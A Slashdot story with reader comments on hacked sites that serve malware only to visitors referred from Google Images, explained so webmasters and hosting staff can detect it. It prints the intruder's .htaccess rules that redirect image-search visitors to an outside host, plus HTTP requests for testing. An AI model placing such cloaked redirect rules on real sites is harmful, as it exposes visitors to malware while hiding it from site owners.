Forgot your password?
typodupeerror
Security The Internet

Image Searchers Snared By Malware 144

Posted by samzenpus
from the caught-in-the-net dept.
Slashdot frequent contributor Bennett Haselton writes "Sites that have been hacked by malware writers are now serving infected content only when the visitor views the site through a frame on Google Images. This recent twist on a standard trick used by malware writers, makes it harder for webmasters and hosting companies to discover that their sites have been infected. Automated tools that check websites for infections and training procedures for hosting company abuse-department staffers will have to be updated accordingly." Read on for the rest of Bennett's thoughts.

A friend of mine recently e-mailed a discussion list with an interesting query. Stonewall Ballard had searched on "tradingbloxlogo" on Google Images, which led to the results on this page. Clicking on the first result, an image from the tradingblox.com site, took him to this page, with the Google information header at the top, and loading the http://www.tradingblox.com/tradingblox/courses.htm page in a frame in the bottom half of the browser window. When that page was loaded in that bottom frame, Internet Explorer and Firefox would both flash warnings about the page being infected with malware. But if you loaded the http://www.tradingblox.com/tradingblox/courses.htm page in a normal Web browser window by itself, the browser would not display any warning, and checking the site using Google's malware query form returned a result saying the site was not suspicious. Why the differing results?

It turned out that the tradingblox.com had been hacked, and pages had been installed onto the server that would serve malware in an unusual way: If the page was being viewed in a frame loaded from Google Images, or as as result of a click through from Google Images, then the page would serve content that attempted to infect the user's computer with malware. On the other hand, if the page was viewed normally (as a result of typing the page into your browser), the malware-loading code would not be served. That means if you were to telnet to port 80 on the www.tradingblox.com server, and request a page as follows:

GET /tradingblox/courses.htm HTTP/1.1
Host: www.tradingblox.com

then the normal page would be returned. But if you entered these commands:

GET /tradingblox/courses.htm HTTP/1.1
Host: www.tradingblox.com
Referer: http://images.google.com/

then you would get the malware-infected page. (The webmaster has since fixed the problem, so that the latter request will no longer get the malware code.) The webserver would only serve the infected content if "images.google.com" was sent specifically as the referrer; "www.google.com" by itself would not trigger the result.

(For the uninitiated, when you click a link from one page to another, for example if you were reading an article on CNN.com which had a link to http://www.google.com/support/ and you clicked on that link, then when your browser requested the file "/support/" from the www.google.com server, it would send the request as follows:

GET /support/ HTTP/1.1
Host: www.google.com
Referer: http://www.cnn.com/article.url.goes.here/

So the webmasters of www.google.com can see what links people are clicking from other websites to reach the www.google.com site. Many sites use this to track which links from other pages, including advertisements that they've bought on other sites, are sending them the most traffic.)

Denis Sinegubko, owner of the website malware-infection checking site UnmaskParasites.com, says that he had seen pages before which would serve infected content if www.google.com itself were listed in the Referer: field. However, this was the first instance he'd seen where the content was only served if images.google.com was specifically listed as the Referer. Since no malware distributor would manually break into just one website to compromise it in this exact manner, it's extremely likely that there are many more sites that are infected in the same way. Stonewall Ballard noted that the Google Safe Browsing lookup for the hosting company where tradingblox.com is hosted, showed a high number of other sites on the same network that had been infected recently. (And those are only the infected sites that Google knows about -- recall that Google didn't even know that tradingblox.com was infected.)

Obviously, from the malware author's point of view, the point of serving malware content only some of the time rather than all of the time, is to make it harder for webmasters to pinpoint the problem. Someone gets the malware warning after following a link or loading a page via Google Images, and sends the webmaster an e-mail saying, "I got infected by your webpage, here is the link." The webmaster views the link and says, "I don't know what you're talking about, there's no malware code on that page." It also makes it harder for automated site-checking tools to detect the infection. Google's Safe Browsing lookup tool reported the site as uninfected, and Sinegubko's site-checking tool on UnmaskParasites.com also reported no malware infections on tradingblox.com, even while the site was still infected. (Sinegubko said he would possibly modify his site-checking script so that in addition to the other checks it performs, it will attempt to request a page sending "http://images.google.com/" in the "Referer:" field, to see if that results in different content being served. Google's Safe Browsing spider should do the same.)

Sinegubko said he's also seen instances where hacked sites would cover their tracks even further, by refusing to display infected content if the Referer: link from Google contained "inurl:domainname.com" or "site:domainname.com". This is because webmasters would sometimes check if their site was serving infected content in response to a click from Google, by doing a Google search on their own domainname.com, and following the link back to their site. By not serving the infected content in that case, the malware infection becomes even harder to detect.

This also makes it harder to report the exploits to the hosting companies that host infected websites. In case the webmaster of the infected site doesn't respond to complaints that their site is infected, sometimes you have to contact the hosting company and ask them to forcibly take the website offline until the problem is fixed. And I have been hosted by several companies where the tech support and abuse departments were (just barely) competent enough that if I called them up and said, "Your customer is hosting a malware-infected webpage, go to this page and view the source code, and you can see the malicious code", they would have known what to do. But if I'd had to tell them to follow the steps above -- "telnet to port 80" on the infected website, and type a few lines to mimic the process of a browser sending HTTP request headers to the website -- I probably would have lost them at "telnet". (Recall an experiment wherein I e-mailed some hosting companies from a Hotmail account, asking them to change the nameservers for a domain that I had hosted with them, and about half of the hosting companies agreed to switch the domain nameservers -- essentially, transferring the entire website to an unknown third party -- without ever authenticating that it was really me writing from that Hotmail account. Which means anybody could have taken over those websites simply by sending an e-mail. Front-end tech support at cheap hosting companies is often not very smart.)

Fortunately, Tim Arnold, the webmaster of the tradingblox.com site, did respond to the original report about the malware-infected pages, and found that an intruder had hacked the site on November 30th and inserted these lines into an .htaccess file:

RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*images.google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*images.search.yahoo.*$ [NC]
RewriteRule .* http://search-box.in/in.cgi?4&parameter=u [R,L]
<Files 403.shtml>
order allow,deny
allow from all
</Files>

which resulted in the infected pages being served whenever a user loaded the site via Google Images. (So if you found this article because you think your own site might be infected by malware that serves pages conditionally on the Referer: field, that's the first place to look to fix the problem!)

It's uncertain how Arnold's site got infected in the first place, but Sinegubko had earlier said that almost 90% of breakins in 2009 that occurred on Linux-hosted sites, were caused by malware installed surreptitiously on people's Windows PCs and stealing the passwords that people used to administer their sites. Or the site could have been compromised via a WordPress exploit such as this one. As I always tell anyone who will listen, if you want to keep your Linux-hosted website from being broken into, one of the most frequently overlooked precautions that you need to take is to keep your Windows PC free of spyware.

But the larger point is that as malware becomes more aggressive, it's not just going to become harder to keep your PC and websites uninfected. It's also going to become harder for site owners and for hosting company abuse departments to verify that a site has been hacked, as the hacks use more sophisticated techniques to prevent the infection from being discovered. Abuse report handlers will have to be trained to understand what it means that a website is only showing infected content as a result of a "Referer:" header, and ideally should know enough about networking and command-line tools, to be able to mimic the "telnet" instructions above. (Most expensive dedicated hosting companies like RackSpace, do have technical staff who are at least that knowledgeable. But cheap shared hosting companies -- the kind where you can get your domain transferred to another company by sending an e-mail from an unauthenticated Hotmail account -- will have to train their abuse staff better.) Automated site-checking tools like Google's Safe Browsing spider and UnmaskParasites.com's site checker will have to start taking these attacks into account when checking a site for infection.

And as always, keeping your PC free of spyware, shouldn't be viewed just as a convenience to yourself, but as an obligation to your neighbors as well. (A case of the positive/negative externalities problem in economics.) You wouldn't send your kid to school with the flu, so why did you get your Mom on the Internet without buying her some anti-virus software?

This discussion has been archived. No new comments can be posted.

Image Searchers Snared By Malware

Comments Filter:
  • Should Be Shot (Score:3, Insightful)

    by Anonymous Coward on Thursday February 04, 2010 @11:35AM (#31022778)

    Malware and Virus authors should be lined up against a wall and shot. They are cancers and need to be irradiated.

    • by sycodon (149926) on Thursday February 04, 2010 @11:36AM (#31022798)

      I mean eradicated...although irradiated would probably work well too.

      • Re:Should Be Shot (Score:3, Insightful)

        by Spyware23 (1260322) on Thursday February 04, 2010 @12:10PM (#31023228) Homepage

        What we -should- do is focus on things that we can actually benefit from. Instead of mass-murder, why not fix the internet by fixing javascript (ie. dis, fucking, allow, whitelist basis only), fixing flash (bye), fixing CSS (stop reading my history and stop scanning my ports!) and fixing HTML so we don't need to rely on stupid things (flash, silverlight, the thing Google made) to make browsing an enjoyable experience.

        I can deliver you a browser that is virtually unexploitable. Firefox running with NoScript, Flash on a whitelist basis and a few other security-related add-ons - it will be -very- secure. Why not make these security (pre)cautions _mandatory_ in browsers that come with purchasable operating systems?

        Honestly, just making javascript operate on a whitelist basis only would reduce online malware attacks by about 99.5%.

        • by operagost (62405) on Thursday February 04, 2010 @12:16PM (#31023320) Homepage Journal
          How do you expect to "fix" HTML to provide advanced features after we've gotten rid of javascript, Flash, and Silverlight? And what does CSS have to do with reading your history and scanning your ports?
          • by Spyware23 (1260322) on Thursday February 04, 2010 @12:30PM (#31023480) Homepage

            Everything. I'll just throw a couple of links at you and then you can go be scared.

            http://ha.ckers.org/weird/javascriptless-port-scanning.cgi [ckers.org], http://ha.ckers.org/weird/CSS-history.cgi [ckers.org].

            I suggest that if you want to be up to date with the web app security world, you should keep reading blogs of security researchers, and perhaps security research-related fora (like sla.ckers.org).

            As for your first question, I suggest you read the HTML 6 specs that have been presented. Also, remember that a browser is just a tool that parses text into pretty "websites". We simply don't need Flash and Silverlight if we have better options for, say, video client-side.

            And, in it's current form, Javascript, should be switched off everywhere too. We _cannot have_ exploitable vulnerabilities in W3C recommended document formats like CSS, and widespread used technologies like Javascript.

            • Re:Should Be Shot (Score:3, Informative)

              by AliasMarlowe (1042386) on Thursday February 04, 2010 @01:29PM (#31024216) Journal

              I'll just throw a couple of links at you and then you can go be scared.
              http://ha.ckers.org/weird/javascriptless-port-scanning.cgi [ckers.org], http://ha.ckers.org/weird/CSS-history.cgi [ckers.org].

              Well, I just visited both of your links, and am unimpressed and unscared.

              The CSS history one gave a very short list of what looked like guessed web sites which were mostly wrong (hint: I never visit msn or ebay or myspace, and it's months since I visited yahoo). It looked like blind guesswork, as the list had google, but not slashdot, for instance. Clicking through to see what information they claim to have logged, I encountered an empty list, not even the bogus guesses of wrong web sites that were on the initial page.

              The port scanning page also gave a rather short list of all wrong IPs and one IP:port combo (hint: my LAN is not on 192.168.0.* or 192.168.1.*). Clicking through for the logged information, it just repeated the same set of all-wrong crap that was on the initial page. The only entry which was close to being plausible was 127.0.0.1:8080, since that IP obviously exists. However I have nothing on port 8080, and trying to visit that address just gives a "could not connect" error...

              Please elaborate on why I should be scared.

              • by AliasMarlowe (1042386) on Thursday February 04, 2010 @01:38PM (#31024354) Journal
                Forgot to mention: Javascript, Java, and Flash were all enabled when I visited your silly "scary" links.
              • Re:Should Be Shot (Score:3, Informative)

                by Philip_the_physicist (1536015) on Thursday February 04, 2010 @09:42PM (#31029944)

                That list is the sites being tested, if it can detect any of them in your history, it shows red text in a box next to that item. The exploit can only check a specific list of items. The problem is a UI/implementation one, not a problem with the concept.

                • by AliasMarlowe (1042386) on Friday February 05, 2010 @07:17AM (#31033072) Journal

                  That list is the sites being tested, if it can detect any of them in your history, it shows red text in a box next to that item.

                  Perhaps you should check your code again.
                  It showed the red "visited" text in a box beside all of the incorrect IP addresses and the 127.0.0.1:8080 combination. I reiterate that my LAN is not on 192.168.0.* or 192.168.1.* but the page claims that I visited addresses 192.168.0.1 192.168.0.2 192.168.1.1 and 192.168.1.2 which is clearly impossible. In fact, it does that even when I use a PC which is directly connected to a public IP, and not on our home LAN.
                  FYI we have 8 fiber ports at home, each with a public IP, but only one of them is connected to the router/firewall. The router assigns our LAN addresses in a different class C private net than any of the common defaults for routers.

            • by abigor (540274) on Thursday February 04, 2010 @01:41PM (#31024406)

              Neither of those links provided any kind of accurate information. Very non-scary, I have to say.

        • by Sir_Lewk (967686) <sirlewk@gmai l . com> on Thursday February 04, 2010 @12:18PM (#31023346)

          The reason this will never happen (and it should) is because we have art students, not engineers, designing our websites, and thus calling the shots.

          Some parts of computing should just not be done by non-technical users, designing secure systems is one of them.

          • Re:Should Be Shot (Score:3, Interesting)

            by Beardo the Bearded (321478) on Thursday February 04, 2010 @12:48PM (#31023720)

            Okay, only a Professional Software Engineer can design webpages or write code. In BC, that's an actual discipline for Engineers. (I'm Electrical myself; one of my friends has her P.Eng in Software, and my alma mater was one of the first to offer it.)

            See how that works?

            The real problem is really your attitude, not the fact that "artsy-fartsies" are writing webpages in Dreamweaver. We can talk about the relative merits and security of Windows / OS ? / Lunix all day (which, really, is what /. is all about) but the problem has shifted. We still have some phishing attacks and the ever-present Trojan horse, but the game has shifted significantly here. Getting your PC hacked by viewing a framed image? That's not a 1995 trick anymore. That's showing a very high level of sophistication and talent.

            This is a hip-hip-horrah moment, and you should have a chill down your spine.

            No system is secure, unless it is powered off, with no OS, no power supply, and locked in a vault after being encased in concrete, and even that's no guarantee. Hell, even Kodak had problems with frames that were still in the motherfucking boxes at Wal-Mart. [slashdot.org] Big deal, you say, so what if some /b/tards put goatse on 10,000 frames? Do you think that's all that happened? We know that images can carry malicious code, and I guarantee that several of those benign-looking default Kodak logos were replaced by infected pictures that 0wz0r3d your box the moment you plugged in via USB or, apparently, looked at the pictures with your browser.

            The malware writers are talented, dedicated, and tireless. All they have to find is one mistake anywhere and It Is Compromised. You have to make sure there are no holes. Surely you can see how you can't win that game.

            It's not B.A.s. We're outgunned and outnumbered.

            • by Sir_Lewk (967686) <sirlewk@gmai l . com> on Thursday February 04, 2010 @01:41PM (#31024416)

              I'm not really sure what you are running off about, but I'm fairly sure that at least a fair chunk of it is unrelated to my post which you are responding to...

              I was simply indicating that getting rid of plugins like flash, locking down javascript, and in general getting the seperation of data and executable code right is never going to happen because the people who are currently calling the shots and driving the market either do not understand computer security, or do not make it a priority.

              In my opinion, this is because those powers that be generally have graphics design or other somehow nontechnical backgrounds and are more concerned with how a website looks and works, then with how secure it is. I'm not faulting these people, their job is important and they can't be expected to be knowledgable in computer security in addition to the work they already do. There is no easy solution to the problem.

              The real problem is really your attitude, not the fact that "artsy-fartsies" are writing webpages in Dreamweaver

              I think you are projecting your own prejudices onto my comment. I was not attempting to imply anything negative about art types.

              We can talk about the relative merits and security of Windows / OS ? / Lunix all day

              Huh? That's not what I'm talking about at all...

              No system is secure, unless it is powered off, with no OS, no power supply, and locked in a vault after being encased in concrete, and even that's no guarantee.

              Nowhere in my original post do I see myself attempting to present any sort of security magic bullet...

            • by jwhitener (198343) on Thursday February 04, 2010 @03:47PM (#31025850)

              "We're outgunned and outnumbered."

              Because of that, I can see a future where active monitoring/detection of system changes is going to become more important. Maybe even services that either log into your machine and look at file size, diff, etc.. or actually make requests of your website, mimicking every possible thing a user could do, and look for unintended outcomes (file automatically downloading, for instance.)

          • Re:Should Be Shot (Score:2, Insightful)

            by nomadic (141991) <[nomadicworld] [at] [gmail.com]> on Thursday February 04, 2010 @02:01PM (#31024668) Homepage
            Some parts of computing should just not be done by non-technical users, designing secure systems is one of them.

            If those non-technical users are able to create security holes, than that's the engineer's fault.
            • Re:Should Be Shot (Score:3, Insightful)

              by Sir_Lewk (967686) <sirlewk@gmai l . com> on Thursday February 04, 2010 @02:14PM (#31024830)

              I'm not saying that nontechnical users create security flaws, I'm saying that they demand features that cause security flaws, and the engineers that know better are not in positions to deny them the features. If a high payed media PHB demands that the website for [NEW HIT MOVIE] be made entirely with flash, a lowly engineer pointing out that flash is insecure is not going to get anywhere.

        • by Thoreauly Nuts (1701246) on Thursday February 04, 2010 @12:37PM (#31023582)

          Honestly, just making javascript operate on a whitelist basis only would reduce online malware attacks by about 99.5%

          I realize that I am far from an average user, but I have been using computers for 30 years (the last 15 using Windows) and have never gotten a virus, worm, or any other form of malware on a single computer I have ever owned despite not really using AV software, always logging in as admin, and spending an inordinate amount of time acquiring software on 119th St.

          I don't deny that these things exist but obviously the user is the weakest link as everything you have said is already available to any user who knows how to apply them. Education would go a long way to fixing the problem. Maybe we should require the completion of a computer safety course before a person can be issued a license to use a networked computer?

          As for the article topic, I have blocked google from my network, so again this malware in its current form doesn't exist for me...

          • by a-zarkon! (1030790) on Thursday February 04, 2010 @02:16PM (#31024854)
            Question: What is your process to determine that every computer you've ever owned has never been compromised by malware? Are you doing some kind of checksum on system function and monitoring each inbound and outbound network packet? Not all malware generates a big red flashing skull on your screen. The malware that operates quietly and gives no indication you have a problem is the stuff you need to worry about. Malware frequently actively attacks anti-virus software on top of this; leading to an increasing frequent discussion with users or level 1 support folk along the lines of "what do you mean this machine is infected, the AV didn't pick anything up!" We find these surreptitious infections through layers upon layers of analysis, with many tools watching what's going on. I don't think you can make that kind of definitive statement even if you are running AV software.
        • by Runaway1956 (1322357) on Thursday February 04, 2010 @12:43PM (#31023664) Homepage Journal

          So - I'm sitting here, reading about this newest manifestation of exploitable exploits, and wondering: "how does all this affect Debian?"

          Then you offer up some solutions that would actually start to FIX THE PROBLEMS.

          No script - check.

          Adblock plus - check.

          Turn off Flash - check.

          Ditch silverlight/moonlight - check.

          Disable Java - check.

          What's left? Oh yeah - don't click on obvious bogus links, and don't agree to download a virus scanner. Like, I really need on on Debian.

          What does that leave? Hmmmm. A damn good firewall - check. Firestarter may not be the best, but it hasnt' failed me yet!

          Has anyone mentioned in this thread yet, that security is not a product - instead it is an ongoing process? I guess I just did.

          Houston, all systems are go. May we have clearance for lift off?

          • by Spyware23 (1260322) on Thursday February 04, 2010 @12:55PM (#31023786) Homepage

            You are well informed and protected, but even plain CSS is an attack vector. Yes, to be safe, you need to disable CSS http://search.slashdot.org/comments.pl?sid=1537058&cid=31023480 [slashdot.org]. Also, extensions like LocalRodeo, SafeHistory and SafeCache might be worthy add-ons to your arsenal. Although some of those extensions might be deprecated/unusable in the latest version of Firefox/Iceweasel (even with Nightly Tester Tools).

        • by RadioElectric (1060098) on Thursday February 04, 2010 @12:57PM (#31023816)

          Firefox running with NoScript

          Just to whinge for a moment, Firefox+NoScript really get on my tits. Seems like it wants to add a new update to one or the other every bloody day.

    • by Mister Whirly (964219) on Thursday February 04, 2010 @12:11PM (#31023246) Homepage
      Yes, becasue over reacting and making the punishment much worse than the crime is ALWAYS a good idea.

      I also say execution for jaywalking, littering, and spitting in public.
    • by kalirion (728907) on Thursday February 04, 2010 @12:36PM (#31023580)

      Only if the malware directly caused loss of life, or raped some kids or something, would I even consider such a punishment fair.

      No, messing up your PC, making your admin job harder, or even stealing your identity and buying a mansion in your name should not be a capital crime.

      • by sycodon (149926) on Thursday February 04, 2010 @02:37PM (#31025134)

        I'm sure many of Madoff's investors would disagree.

        While my original comment was somewhat tongue-in-cheek I think this game between the virus writers and anti-virus writers is far more serious than most people realize.

        Having your identity stolen and your credit rating ruined can be a life changing event. Lawsuits and even jail time for you are possibilities.

        These days, having you computer hacked into, damaged, or data deleted can the be the equivalent of someone breaking into your home and destroying things...photographs, letters, financial records, etc.

        If you are a computer professional you should have your stuff backed up, but you can still lose hours and hours if you have to rebuild your computer after an attack in addition to whatever wasn't backed up at the time of the attack.

        And of course some people have been prosecuted and found not guilty of child porn charges because they convinced a judge or jury that a virus downloaded the pictures. If this indeed happens, then Shirley, others are in jail for it. Not sure if I buy that, but it is what it is.

        Sure, people should take precautions and such, but really, that's like saying if you don't want to get mugged, don't go out after dark. I think we need to start putting the "muggers" in jail.

        So these guys are not just script kiddies trying to outdo each other. If a virus author is caught, they should serve a very long jail sentence and very large fines. Then, hopefully, someone named Tyrone will use them as his personal little playmate.

  • orly? (Score:5, Insightful)

    by Pharmboy (216950) on Thursday February 04, 2010 @11:39AM (#31022834) Journal

    While I use Windows on the desktop to manage my linux servers like most admins, I find it hard to believe that 90% of all break-ins were caused by an administrator's Windows box getting owned first, to capture their password/login info. That means only 10% of the boxes were directly attacked and owned, yet my logs show overwhelming amount of tries to do just that. This would mean that 90% of the pwned Linux servers are really the fault of Microsoft Windows, and just smacks of bogus accounting.

    • Re:orly? (Score:3, Interesting)

      by T Murphy (1054674) on Thursday February 04, 2010 @11:55AM (#31023020) Journal
      I don't know linux and the malware fight very well, but are those direct attacks intended to work on Windows machines, so that those 10% are the only attacks that even work against a linux box?

      As a slashdot reader who doesn't know much about linux, it often sounds like linux is this magical program that can't do wrong, so clarification for the under-informed would be helpful.
      • by TheRealMindChild (743925) on Thursday February 04, 2010 @12:33PM (#31023532) Homepage Journal
        I have no doubt that malware is likely for linux, but unlike Windows, you can't guarantee a compatible vector for every linux box. Read for instance the problems Google has had with Chromium porting to linux. They couldn't even expect a consistent thread API to be there, depending on whether you were a 2.4 kernel, a 2.6 kernel with pthreads, a 2.6 kernel with NPTL only, . The cost/benefit ratio is just not there for someone to put the time into this kind of attack vector. The code written would have to be bigger, more clever, and hit significantly less people than its Windows counterpart.

        It is like the difference between a job that earns $6 per hour doing ditch digging or a job that earns $300 per half hour just to tell someone they are crazy.
        • by Culture20 (968837) on Thursday February 04, 2010 @01:31PM (#31024246)

          It is like the difference between a job that earns $6 per hour doing ditch digging or a job that earns $300 per half hour just to tell someone they are crazy.

          Our half hour is up. The secretary will handle your bill.

        • by FlyingBishop (1293238) on Thursday February 04, 2010 @02:35PM (#31025106)

          You just use Perl. It's trivial. And as an added bonus, obfuscation is a first-class language feature.

        • by Pharmboy (216950) on Friday February 05, 2010 @03:25PM (#31037970) Journal

          Keep in mind that the vast majority of these attacks are not going after kernel flaws, they are typically going after PHP or MySQL flaws, or default PHP/MySQL settings more than anything. Some obvious Windows exploits are tried, but not that many as it is easy to test if a server is Windows or Linux based in a script, so that is rare in my logs. I haven't run FTP in years, but I remember a bunch of attempts using dictionary attacks when I did.

          Of course, the most common attack is simply SSH logins using common names and passwords. This is why admins like myself move SSH to a different port, which removes 99% of dictionary attacks on SSH, as these are scripts looking for low hanging fruit. Finding what possible port SSH is on would require a wide port scan, which raises a red flag by itself.

    • by Yaa 101 (664725) on Thursday February 04, 2010 @12:46PM (#31023694) Journal

      Why would you use a Windows desktop to manage Linux servers? I think that is totally ineffective.

      But hé, it's your setup and I won't be bothered with it.

      • by ottothecow (600101) <.ottothecow. .at. .gmail.com.> on Thursday February 04, 2010 @01:13PM (#31024012) Homepage
        I would imagine it is incredibly common.

        You can manage it all you want with putty and still connect to your companies exchange server with outlook.

        I'm not a professional admin...but in school I did a bit of admin work on some linux/BSD servers. Most of the work I did was probably sshed in from a windows box either at home or in our little office (before I installed linux on a machine there); I only admined from linux if I was fixing something from class with my linux laptop or if I was standing at a [*nix based] print terminal, switching to a tty from X and sshing into the print server.

        Same happened in some CS classes as well...putty and xming on my desktop let me develop on my desktop with more screen real estate rather than my native linux laptop (also helps that I was sshing into machines 2-3x as fast as my laptop). Hell, even at work now I do all of my SAS work in a bunch of X windows forwarded from an AIX system.

        • Re:orly? (Score:3, Informative)

          by swb (14022) on Thursday February 04, 2010 @01:37PM (#31024342)

          Incredibly common bordering on likely the outright majority.

          For one, its likely that most companies will have some kind of Windows infrastructure and/or Windows application requirements and thus will hand out Windows based laptops/desktops. Admins with a OSS religious affiliation may end up overwriting these systems with Linux or building their own in parallel, but controls/obstacles/requirements/misc bureaucratic bullshit may stop all but the most senior from being able to do this or make it too much of a headache.

          I know someone whose job basically to run an RS/6000 and its application and he is required to use the Windows laptop he was given for some security/accountability purposes, and then there's the office toolchain requirements (Outlook), and then there's the UNIX support applications (all Windows based).

          And then there's sheer inertia. You can't swing your fist without hitting a Windows PC and it generally works with all the hardware, provides windowing and a GUI interface and makes even character-mode UNIX management pretty easy via putty, cut/paste, etc. Plus a lot of server apps (eg, Samba) have functional web GUIs of their own.

          Add in the occasionally hairpulling effort of getting all the hardware/graphics to work right on new laptops under Unix OSes and you can see how someone might just not care what the local video/keyboard platform was for working with a remote server.

    • by RulerOf (975607) on Thursday February 04, 2010 @01:32PM (#31024252)

      This would mean that 90% of the pwned Linux servers are really the fault of Microsoft Windows

      You mean to say that such servers' pwned state is the result of improper security practices on the result of a Windows user. [/pedant]

      In all likelihood, I don't see why this wouldn't be the case. Unless these sites are running some type of publicly available CMS product, like Wordpress or Joomla, chances are good that these sites are uploaded via FTP. There was a feature on Slashdot, it may have been Mr. Hassleton's writing, too, saying that certain types of trojans will scan your incoming and outgoing traffic, looking for FTP sessions and plucking out the credentials. Such is particularly easy, too, because FTP authentication and traffic is completely unencrypted.

      Based on what I've read here and from how prolific the archaic security nightmare known as FTP is, I'd say it's quite plausible.

    • by nasch (598556) on Thursday February 04, 2010 @07:18PM (#31028498)

      That means only 10% of the boxes were directly attacked and owned, yet my logs show overwhelming amount of tries to do just that.

      And how many were successful? I think they're talking about the times a machine is compromised, not how many times it's attacked.

  • by maxume (22995) on Thursday February 04, 2010 @11:40AM (#31022848)

    The free antivirus packages are fine, there is no need to pay for one.

    • by Pojut (1027544) on Thursday February 04, 2010 @11:53AM (#31022988) Homepage

      Agreed. I used AVG for years, and when it became too bloated I moved to Avast. Haven't had a virus on my windows box in close to five years.

      • by lowrydr310 (830514) on Thursday February 04, 2010 @12:26PM (#31023448)
        I haven't used any antivirus software on my Win2K box in the past 9 years and NEVER had a virus in that time.

        Firefox with Adblock Plus, Noscript, and Flashblock. That's it!

        I noticed some sluggish performance recently and suspected malware or a virus. I installed MalwareBytes' Anti-Malware, Clamwin, and Spybot S&D, ran them, and all indicated my system was clean.

        The problem turned out to be a badly fragmented hard drive (haven't defragged since 2001 or 2002!)

        • by RulerOf (975607) on Thursday February 04, 2010 @01:40PM (#31024378)

          I haven't used any antivirus software on my Win2K box in the past 9 years and NEVER had a virus in that time.

          I used to do the same thing, specifically because I didn't want to take the performance hit I have always associated with running an AV product.

          Fast forward a few years, I'm running a dual core chip with gobs of ram and (though I know I'm a minority on this one) an extremely fast hardware RAID controller, I can drag and drop 100GB of data, defrag an array, and run a virus scan... while playing a video game.

          In that time, my AV has caught a few things I didn't suspect were infected, and a few I had expected that were. The ironic thing is that it's frequently deleted a keygen or some such while I've tried to drag and drop it into a virtual machine to run it. In the end, I suppose it's a good thing that most AV products shoot first and ask questions later (including the fake malware/extortion ones).

        • by Pojut (1027544) on Thursday February 04, 2010 @04:30PM (#31026474) Homepage

          As I said previously, I haven't had a virus detected nor have there been any warning signs of one in literally years. The only reason I still run the software is because I'm paranoid.

          Remember...just because you are paranoid doesn't mean they aren't after you!

      • by G00F (241765) on Tuesday February 09, 2010 @01:21PM (#31074288) Homepage

        I have seen way to many people with AVG installed with up to date definitions, and have viruses. I now suggest Avast as a free solution or even better pay for trendmicro or kaspersky.

  • by santax (1541065) on Thursday February 04, 2010 @11:41AM (#31022850)
    Man, this is how I view my porn, and I use that method just to be safe! What now :(
  • Immunity ? (Score:1, Interesting)

    by Anonymous Coward on Thursday February 04, 2010 @11:41AM (#31022852)

    I visited one of these sites , because I'm a limited user, the Malware didn't install .
      So I question how much of this is because consumers foolishly run as owner.admin? or disable UAC .Then those that run Linux or a Mac are likely to be immune and probably in that order. Linux machines being much more secure .

  • by Itninja (937614) on Thursday February 04, 2010 @11:46AM (#31022918) Homepage
    For all that are hypersensitive to misspellings. The term 'referer' is not [wikipedia.org] a typo (at least, not in this article).
  • by T Murphy (1054674) on Thursday February 04, 2010 @11:47AM (#31022924) Journal

    RewriteCond %{HTTP_REFERER} .*images.google.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*images.search.yahoo.*$ [NC]

    I don't see Bing on there.

  • by Marcus Erroneous (11660) on Thursday February 04, 2010 @11:50AM (#31022950) Homepage

    Okay, insert obligatory "One more reason not to use Windows" comment here, after all, this is Slashdork.
          Yup, Linux and OSX can get infected as well, but it's harder to do so. Especially if you approach it from the point of view that it can happen to you. If you just have to use a Windoze tool, do it via a VM of some sort, pick your fave brand of VM to do so. Some tools (native VMware VI management tools) are only available for Windoze, so I use a VM to run those tools. Other than that, there are options, even for those poor admins that are CLI challenged, for managing stuff without using Windows.
          If you just have to use Windoze because all us Linux g33ks are really l4m3rz and Windoze really is the sh1tz, then Obi Wan, use your mastery of that platform and show us that you're not just all hat and no cattle. Put in the extra time and effort to use your platform of choice without contributing to the delinquency of those less enlightened than you who think that your site is safe.

  • Another one (Score:5, Interesting)

    by The Redster! (874352) on Thursday February 04, 2010 @11:53AM (#31022992)
    This is actually not a new trick. Guy I know once had his website serving up an evil redirect at random like half a year ago -- something like every 1 in 5-6 requests, and then still only with a Google referrer. Even asked me to capture the header with the redirect because his hosting company wouldn't believe him(they eventually fixed it).
  • by MonsterTrimble (1205334) <monstertrimble@hot m a il.com> on Thursday February 04, 2010 @11:54AM (#31023006)
    Shouldn't we be happy about this? I mean, they aren't even TRYING to attack a regular surfer, but only one who comes through google images. That means they are trying a pretty limiting technique which I presume is because that all other methods will not yield as good results.To me that means people are getting better at this anti-virus thing.
    • by HTH NE1 (675604) on Thursday February 04, 2010 @12:14PM (#31023290)

      Shouldn't we be happy about this? I mean, they aren't even TRYING to attack a regular surfer, but only one who comes through google images.

      Yeah, because everyone knows Google Images users are Slightly Irregular.

      That means they are trying a pretty limiting technique which I presume is because that all other methods will not yield as good results.

      Or it's a proof-of-concept implementation being tested for more insidious deployment, say attacking only those who are coming from a (your!) bank's domain, or a government site, or a link from Google Mail embedded in an e-mail's image fetch to confirm your identity as a Chinese dissident.

    • by Internal Modem (1281796) on Thursday February 04, 2010 @12:17PM (#31023326)

      This is just one attack technique among many being used successfully.

    • by RulerOf (975607) on Thursday February 04, 2010 @01:49PM (#31024512)
      It's not that hitting all surfers would yield fewer attack victims in a given amount of time, it's that hitting all of them means that the malicious code is more likely to get caught by an admin. If the malicious code is only active for 24 hours but hits everyone, chances are low that such code will actually result in a successful attack. However, if it can linger for longer periods of time, months or years, and simultaneously evade safe-browsing filters provided by MS/Google/Mozilla, that's likely going to be enough time for a stray IE6 user to wander into something he shouldn't (which is every URI beginning with "http://", so Slashdot tells me).
  • by DesScorp (410532) <DesScorp.Gmail@com> on Thursday February 04, 2010 @11:58AM (#31023064) Homepage Journal

    I've got an old Mac at work I use for various tasks, but I use Windows at home. And it's loaded up with all of the standard defenses... firewalls, anti virus, malwarebytes, spybot s&d, you name it. And yet Windows boxes are still getting owned. And its not even necessarily "bad" websites that are spreading this stuff... porn, torrent sites, etc. There are a lot of websites out there that have no idea that they've been owned, and that they're spreading this filth to Windows machines. The latest trojans with "Internet Security 2010" infect Windows boxes so badly that it often takes longer to completely clean them than it does to just throw up your hands and decide to nuke and pave.

    I know Macs will eventually be a bigger target when they get more of the market, but after one of my family machines became infected... again, despite having all of the necessary security software... I decided it was time to spring for a Mac Mini at home. Better that the wife and kids learn a different OS than Daddy pulling all of his hair out because of yet another damn trojan... despite best efforts to the contrary.

  • by ojintoad (1310811) on Thursday February 04, 2010 @12:01PM (#31023098)
